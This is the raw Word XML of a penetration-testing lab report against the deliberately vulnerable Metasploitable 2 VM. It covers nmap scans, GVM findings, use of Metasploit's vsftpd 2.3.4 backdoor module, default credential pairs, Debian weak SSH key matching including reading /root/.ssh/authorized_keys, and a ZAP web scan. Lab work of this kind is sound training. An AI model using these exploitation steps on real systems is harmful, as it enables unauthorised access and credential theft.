    <w:p w14:paraId="48FABFCE" w14:textId="0401328C" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118321" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 25 SMTP</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118321 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="569D18FA" w14:textId="26055184" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118322" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 2049 Showmount to expose Root Share</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118322 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10CD22BF" w14:textId="63D4122C" w:rsidR="00242AF9" w:rsidRPr="00242AF9" w:rsidRDefault="00012388" w:rsidP="00242AF9">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF7CA24" w14:textId="7D42F572" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00050E8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc155118288"/>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r>
        <w:t>Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF0A86" w14:textId="206CF366" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00460C48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploitable 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130E359" w14:textId="6F154C47" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00460C48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WMware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118289"/>
      <w:r w:rsidRPr="00460C48">
        <w:t>Web references</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00460C48">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDA9014" w14:textId="1192DBDF" w:rsidR="00460C48" w:rsidRPr="00460C48" w:rsidRDefault="00EC3B63" w:rsidP="00460C48">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploitable: 1 - walkthrough | Infosec (infosecins tute.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
        <w:t xml:space="preserve"> Note due to age the website contained a number of deadlinks   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D62DE6" w14:textId="5F70AECD" w:rsidR="00460C48" w:rsidRDefault="00EC3B63" w:rsidP="00460C48">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploitable: 2 - walkthrough | Infosec (infosecins tute.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
        <w:t xml:space="preserve"> Note due to age the website contained a number of deadlinks   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F9A68" w14:textId="0E610454" w:rsidR="005A7850" w:rsidRDefault="00EC3B63"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118290"/>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This document reports on the results of an automatic security scan. All dates are displayed using the timezone Coordinated Universal Time, which is abbreviated UTC. The task was Metasploitable2-Linux. The scan started at Fri Dec 29 14:43:06 2023 UTC and ended at Fri Dec 29 16:51:16 2023 UTC. The report rst summarises the results found. Then, for each host, the report describes every issue found. Please consider the advice given in each description, in order to rectify the issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9509C7" w14:textId="4F355582" w:rsidR="002F504E" w:rsidRDefault="003E6FBA" w:rsidP="006972C5">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Toc155035944"/>
      <w:bookmarkStart w:id="4" w:name="_Toc155036700"/>
      <w:bookmarkStart w:id="5" w:name="_Toc155076320"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="009530CB">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7.25pt;height:49.6pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.DC" ShapeID="_x0000_i1027" DrawAspect="Icon" ObjectID="_1765783961"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118291"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GVM Summary of issues</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="580E6837" w14:textId="4265CA8D" w:rsidR="00706A19" w:rsidRDefault="00F35E63" w:rsidP="00A26A54">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc155118292"/>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118293"/>
      <w:r>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118294"/>
      <w:r>
        <w:t>Operating sytem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>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118295"/>
      <w:r w:rsidRPr="003E2586">
        <w:t>CVE’s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lastRenderedPageBreak/>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118296"/>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r>
              <w:t>Metasploitable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r>
              <w:t>Metasploitable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explana on of the virtual network First, we launch  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C86604A" w14:textId="246CE2AC" w:rsidR="003B5EC8" w:rsidRPr="00050E8D" w:rsidRDefault="003B5EC8" w:rsidP="003B5EC8">
      <w:r>
        <w:t xml:space="preserve">Metasploit from the command line from kali sudo msfdb init &amp;&amp; msfconsole   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D73CFF" w14:textId="0E730385" w:rsidR="00050E8D" w:rsidRDefault="00A55419" w:rsidP="00460C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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lastRenderedPageBreak/>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dhclient -d -nw -eth0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r>
        <w:t xml:space="preserve">nmap -sV -O 192.168.254.186   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29F6FA" w14:textId="77777777" w:rsidR="009E78F3" w:rsidRDefault="009E78F3" w:rsidP="009E78F3">
      <w:r>
        <w:t xml:space="preserve">Breaking down the command    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F48C6B" w14:textId="77777777" w:rsidR="009E78F3" w:rsidRDefault="009E78F3" w:rsidP="009E78F3">
      <w:r>
        <w:t xml:space="preserve">-sV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r w:rsidRPr="00347CDD">
        <w:t>nmap -s</w:t>
      </w:r>
      <w:r w:rsidR="00241320">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00347CDD">
        <w:t xml:space="preserve"> -O -oA meta 192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582BA4CB" w14:textId="0AA53E58" w:rsidR="008A7F30" w:rsidRDefault="008A7F30" w:rsidP="006A30D1">
      <w:r>
        <w:t xml:space="preserve">-sC </w:t>
      </w:r>
      <w:r w:rsidRPr="008A7F30">
        <w:t xml:space="preserve">  -sC: equivalent to --script=default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEBE3A0" w14:textId="77777777" w:rsidR="00347CDD" w:rsidRDefault="00347CDD" w:rsidP="00347CDD">
      <w:r>
        <w:t xml:space="preserve">-sV will help determine the service running   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7EDB07" w14:textId="742E8E75" w:rsidR="00D308AE" w:rsidRDefault="00347CDD" w:rsidP="00D308AE">
      <w:r>
        <w:t xml:space="preserve">-O will try to identify the OS running on the target.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0349602B" w14:textId="77777777" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="00D308AE"/>
    <w:p w14:paraId="27FF8D45" w14:textId="77777777" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="00D308AE"/>
    <w:p w14:paraId="23235039" w14:textId="77777777" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="00D308AE"/>
    <w:p w14:paraId="3DC28BAE" w14:textId="77777777" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="00D308AE"/>
    <w:p w14:paraId="69DA14D2" w14:textId="77777777" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="00D308AE"/>
    <w:p w14:paraId="75E37D3A" w14:textId="77777777" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="00D308AE"/>
    <w:p w14:paraId="6298871F" w14:textId="77777777" w:rsidR="00D76D9B" w:rsidRDefault="00D308AE" w:rsidP="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc155118297"/>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bindshell</w:t>
      </w:r>
      <w:r w:rsidR="00FB5467">
        <w:t xml:space="preserve"> “metasploit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649F5566" w14:textId="4249B5E3" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="006631BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc155118298"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00CA1453" w:rsidRPr="00CA1453">
        <w:t>orts 513</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="4A67ECFA" w14:textId="3361AAEB" w:rsidR="00E17435" w:rsidRDefault="006631BA" w:rsidP="00E17435">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00CA1453" w:rsidRPr="00CA1453">
        <w:t xml:space="preserve">re open, known as "r" services if they are misconfigured, they could allow remote login.  These ports were also discovered within the GVM report available click here Metasploitable2-Linux.pdf for more </w:t>
      </w:r>
      <w:r w:rsidR="00CA1453">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4D9E1CE" w14:textId="4F7D0A50" w:rsidR="00B115CF" w:rsidRDefault="00B115CF" w:rsidP="00E17435"/>
    <w:p w14:paraId="515EEFFA" w14:textId="77777777" w:rsidR="00B115CF" w:rsidRDefault="00B115CF" w:rsidP="00E17435"/>
    <w:p w14:paraId="3693B829" w14:textId="77777777" w:rsidR="00B115CF" w:rsidRDefault="00B115CF" w:rsidP="00E17435"/>
    <w:p w14:paraId="3D99ECA3" w14:textId="77777777" w:rsidR="00B115CF" w:rsidRDefault="00B115CF" w:rsidP="00E17435"/>
    <w:p w14:paraId="5E0C7410" w14:textId="62B6CF5F" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="006631BA"/>
    <w:p w14:paraId="5F5952BC" w14:textId="126C604B" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="006631BA">
      <w:r>
        <w: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118299"/>
      <w:r w:rsidRPr="008314C5">
        <w:t xml:space="preserve">Exploitng Port 21 </w:t>
      </w:r>
      <w:r w:rsidR="002F6D85">
        <w:t>FTP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="3069E9E5" w14:textId="539B5B3D" w:rsidR="00333131" w:rsidRDefault="00BD308A" w:rsidP="00E17435">
      <w:r w:rsidRPr="00BD308A">
        <w:t>Running vs</w:t>
      </w:r>
      <w:r w:rsidR="00142AB4">
        <w:t>ft</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD308A">
        <w:t xml:space="preserve">pd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020B2AC5" w14:textId="34F7C101" w:rsidR="00333131" w:rsidRDefault="00333131" w:rsidP="00E17435">
      <w:r>
        <w:t>Nmap scan results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E89E82" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>1/tcp   open  ftp         vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215CE06" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|_ftp-anon: Anonymous FTP login allowed (FTP code 230)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D8C22" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t xml:space="preserve">| ftp-syst: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Logged in as ftp</w:t>
      </w:r>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Session timeout in seconds is 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980D842" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      Control connection is plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF51E6F" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      Data connections will be plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D8CF3" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      vsFTPd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 xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor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4006E18" w14:textId="4C588BBA" w:rsidR="00A451C2" w:rsidRDefault="007A5D93" w:rsidP="007A5D93">
      <w:r>
        <w:t xml:space="preserve">Verified access by </w:t>
      </w:r>
      <w:r w:rsidR="00E7387F">
        <w:t>running whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AE5AA5" w14:textId="4C33F0B5" w:rsidR="00DB6252" w:rsidRDefault="00DB6252" w:rsidP="00DB6252">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc155118300"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres:postgres</w:t>
      </w:r>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08D56D94" w14:textId="77777777" w:rsidR="0089426B" w:rsidRDefault="0089426B" w:rsidP="00A315C1"/>
    <w:p w14:paraId="7AB75139" w14:textId="77777777" w:rsidR="0089426B" w:rsidRDefault="0089426B" w:rsidP="00A315C1"/>
    <w:p w14:paraId="43D2FC0C" w14:textId="77777777" w:rsidR="0089426B" w:rsidRDefault="0089426B" w:rsidP="00A315C1"/>
    <w:p w14:paraId="24F53DBE" w14:textId="77777777" w:rsidR="0089426B" w:rsidRDefault="0089426B" w:rsidP="00A315C1"/>
    <w:p w14:paraId="30A50273" w14:textId="77777777" w:rsidR="0089426B" w:rsidRDefault="0089426B" w:rsidP="00A315C1"/>
    <w:p w14:paraId="6D97B94F" w14:textId="77777777" w:rsidR="0089426B" w:rsidRDefault="0089426B" w:rsidP="00A315C1"/>
    <w:p w14:paraId="2785D3C8" w14:textId="3239A8D1" w:rsidR="00A451C2" w:rsidRDefault="00860812" w:rsidP="00A315C1">
      <w:r w:rsidRPr="00860812">
        <w:lastRenderedPageBreak/>
        <w:t>service:service</w:t>
      </w:r>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r>
        <w:t>user:user</w:t>
      </w:r>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The following devices are / software is known to be aected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D02CB" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>- CVE-2001-1594: Codonics printer FTP service as used in GE Healthcare eNTEGRA P&amp;R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE0D973" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- CVE-2013-7404: GE Healthcare Discovery NM 750b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002DC7E" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>- CVE-2017-8218: vsftpd on TP-Link C2 and C20i devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D1A973" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>- CVE-2018-19063, CVE-2018-19064: Foscam C2 and Opticam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118301"/>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22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD4DF32" w14:textId="77777777" w:rsidR="00D80837" w:rsidRDefault="00D80837" w:rsidP="00D80837">
      <w:r>
        <w:t xml:space="preserve">| ssh-hostkey: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483845E" w14:textId="77777777" w:rsidR="00D80837" w:rsidRDefault="00D80837" w:rsidP="00D80837">
      <w:r>
        <w:t>|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40172977" w14:textId="6479BFB8" w:rsidR="00D80837" w:rsidRDefault="00D80837" w:rsidP="00D80837">
      <w:r>
        <w:t>|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A30AA4" w14:textId="75242175" w:rsidR="00C4744C" w:rsidRDefault="001E05FC" w:rsidP="001E05FC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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debianssh/common_keys at master · g0tmi1k/debian-ssh (github.com)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC43749" w14:textId="77777777" w:rsidR="00D80D9B" w:rsidRDefault="00D80D9B" w:rsidP="00D80D9B">
      <w:r>
        <w:t xml:space="preserve">The files required for this can be downloaded at wget --no-checkcertificate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lastRenderedPageBreak/>
        <w:t xml:space="preserve">192.168.254.186 root rsa/2048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09551F8" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:t xml:space="preserve">Lets look at whats going on with the keys run  cat /root/.ssh/authorized_keys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grep  run that key against the extract keys I get a match  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF490B5" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:t>grep -lr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This is a match as the walkthrough</w:t>
      </w:r>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oHostKeyAlgorithms=+ssh-dss msfadmin@192.168.254.186  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5CAE3E" w14:textId="46160ED7" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00D80D9B">
      <w:r>
        <w:t>I could regenerate the keys</w:t>
      </w:r>
      <w:r w:rsidR="00D414BC">
        <w:t xml:space="preserve"> but that would change the pub key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317229DC" w14:textId="31ED05F0" w:rsidR="009B4322" w:rsidRDefault="009B4322" w:rsidP="00D80D9B">
      <w:r>
        <w:t xml:space="preserve">This is the response from metasploite3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178AA1A2" w14:textId="79459C83" w:rsidR="009B4322" w:rsidRDefault="009B4322" w:rsidP="00D80D9B">
      <w:r w:rsidRPr="009B4322">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E9249D1" wp14:editId="0F84F22C">
            <wp:extent cx="5731510" cy="1038860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="28284578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5782" name="Picture 1" descr="A computer screen shot of a number&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1038860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2388D003" w14:textId="0F4FE863" w:rsidR="009B4322" w:rsidRDefault="009B4322" w:rsidP="00D80D9B">
      <w:r>
        <w:t>Which I would expect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670220C7" w14:textId="34A10C86" w:rsidR="00D316B5" w:rsidRDefault="00D316B5" w:rsidP="001563F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc155118302"/>
      <w:r>
        <w:t xml:space="preserve">Port 80  </w:t>
      </w:r>
      <w:r w:rsidR="002F6D85">
        <w:t>Web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>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7"/>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Stright away the page has credentials displayed on it</w:t>
      </w:r>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562B1914" w:rsidR="005A6B1E" w:rsidRDefault="00D316B5" w:rsidP="008B708C">
      <w:r>
        <w:t xml:space="preserve">Here I ran zap </w:t>
      </w:r>
      <w:r w:rsidR="009337DE">
        <w:t>a zap scan.</w:t>
      </w:r>
      <w:r w:rsidR="00D80D9B">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A6C48" w14:textId="4E6DEC4E" w:rsidR="008B708C" w:rsidRDefault="00D94CD0" w:rsidP="008B708C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76932931" wp14:editId="6A0F5695">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1486535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4991100" cy="7711440"/>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100" cy="7711440"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6656832" cy="8692897"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1437" name="Picture 1437"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>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40"/>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1"/>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2"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="6096" y="0"/>
                            <a:ext cx="6635190" cy="3194304"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1449" name="Picture 1449"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId43"/>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4"/>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5"/>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6"/>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05pt;width:393pt;height:607.2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D/9lQSwMECgAAAAAAAAAhAJUEoNqTAgAAkwIAABQAAABkcnMvbWVkaWEvaW1hZ2Uy&#10;LmpwZ//Y/+AAEEpGSUYAAQEBAGAAYAAA/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwK&#10;DAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgAOgA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ZUEsDBAoAAAAAAAAAIQCRN5xigwIA&#10;AIMCAAAUAAAAZHJzL21lZGlhL2ltYWdlMy5qcGf/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMAAwIC&#10;AwICAwMDAwQDAwQFCAUFBAQFCgcHBggMCgwMCwoLCw0OEhANDhEOCwsQFhARExQVFRUMDxcYFhQY&#10;EhQVFP/bAEMBAwQEBQQFCQUFCRQNCw0UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFP/AABEIAEAA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ZUEsDBAoAAAAAAAAA&#10;IQDibv89vZMBAL2TAQAUAAAAZHJzL21lZGlhL2ltYWdlNC5qcGf/2P/gABBKRklGAAEBAQBgAGAA&#10;AP/bAEMAAwICAwICAwMDAwQDAwQFCAUFBAQFCgcHBggMCgwMCwoLCw0OEhANDhEOCwsQFhARExQV&#10;FRUMDxcYFhQYEhQVFP/bAEMBAwQEBQQFCQUFCRQNCw0UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFP/AABEIBBgH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Q&#10;J+zR/wAm4/Cr/sU9K/8ASOKv5+6/oE/Zo/5Nx+FX/Yp6V/6RxUAfiT+1F/ycx8W/+xw1X/0tkrzG&#10;vTv2ov8Ak5j4t/8AY4ar/wClsleY0AFFFFABRRRQAUUUUAFFFFABRRRQMKKKK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j8tP+eh/7+VJ5dFFZezpmP1ekFHlUUVp7NGvs0FFFFMYUUUUAFReVUtFKye4rJ7hRRRRZDDy&#10;qPK8qiiiyFZEXl1L5XlUUVn7NGfs0HlUUUVpZB7NBRRRRZGlkFFFFMYVF5VS0UrJ7isnuHleVRR